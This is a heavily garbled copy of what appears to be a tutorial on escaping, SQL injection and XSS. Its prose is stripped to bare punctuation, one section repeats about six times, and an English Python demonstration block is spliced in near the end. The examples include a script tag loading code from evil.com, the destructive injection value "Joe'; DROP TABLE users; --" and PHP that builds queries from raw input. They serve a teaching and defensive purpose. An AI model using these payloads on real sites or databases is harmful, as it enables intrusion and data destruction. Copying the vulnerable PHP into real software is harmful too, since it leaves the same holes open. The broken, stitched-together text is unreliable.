<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .

Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .
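To make the three versions of the lookup shown on this page concrete, here is an added example in Python (not the article's own PHP, which uses mysql_* and PDO): the same inputs the article uses are run through naive string building, through the quote-escaping the article shows, and through a real prepared statement against an in-memory SQLite table; the last function reproduces the article's htmlspecialchars output. Assumptions: SQLite stands in for MySQL, the sample rows are constructed here, and escape_like_mysql is a hypothetical minimal imitation, not the real library function.

```python
"""Added example, not from the original article: the article's three ways of
building the same query, plus its HTML-escaping step, run end to end.
Assumed: SQLite in place of the article's MySQL; `users` rows constructed here.
"""
import html
import sqlite3

# Inputs taken from the article's own examples.
NAMES = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]


def naive_query(name: str) -> str:
    """The article's first, vulnerable version: the name is pasted straight
    into the SQL text, so the SQL parser cannot tell data from code."""
    return f"SELECT phone_number FROM users WHERE name = '{name}'"


def escape_like_mysql(name: str) -> str:
    """Hypothetical, deliberately minimal imitation of what the article shows
    mysql_real_escape_string doing to these inputs (' becomes \\').
    Constructed for illustration only: the real function also handles NUL,
    newlines, double quotes and the connection's character set."""
    return name.replace("\\", "\\\\").replace("'", "\\'")


def escaped_query(name: str) -> str:
    """The article's second version: same string building, escaped input."""
    return f"SELECT phone_number FROM users WHERE name = '{escape_like_mysql(name)}'"


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the article's `users` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, phone_number TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("Alex", "555-0100"), ("Mc'Donalds", "555-0101"), ("Joe", "555-0102")],
    )
    return conn


def lookup_prepared(conn: sqlite3.Connection, name: str) -> list:
    """The article's third version: a prepared statement. The SQL text is
    fixed; `name` travels separately and is only ever treated as a value,
    so a quote or a semicolon inside it never reaches the SQL parser as SQL."""
    cur = conn.execute("SELECT phone_number FROM users WHERE name = ?", (name,))
    return [row[0] for row in cur.fetchall()]


def table_still_exists(conn: sqlite3.Connection) -> bool:
    """Check that `users` survived the lookups (it does with the prepared form)."""
    row = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type='table' AND name='users'"
    ).fetchone()
    return row[0] == 1


def render_post_body(body: str) -> str:
    """The htmlspecialchars step from the article's XSS section: the same
    text, but every character that means something to an HTML parser is
    written as an entity, so the browser displays it instead of obeying it."""
    return html.escape(body, quote=True)


def run_demo() -> dict:
    """Run every article input through the three versions; return the results."""
    conn = make_db()
    out = {n: (naive_query(n), escaped_query(n), lookup_prepared(conn, n)) for n in NAMES}
    out["users_table_intact"] = table_still_exists(conn)
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
    print(render_post_body('<script src="http://evil.com/dangerous.js" '
                           'type="text/javascript" charset="utf-8"></script>'))
```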





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

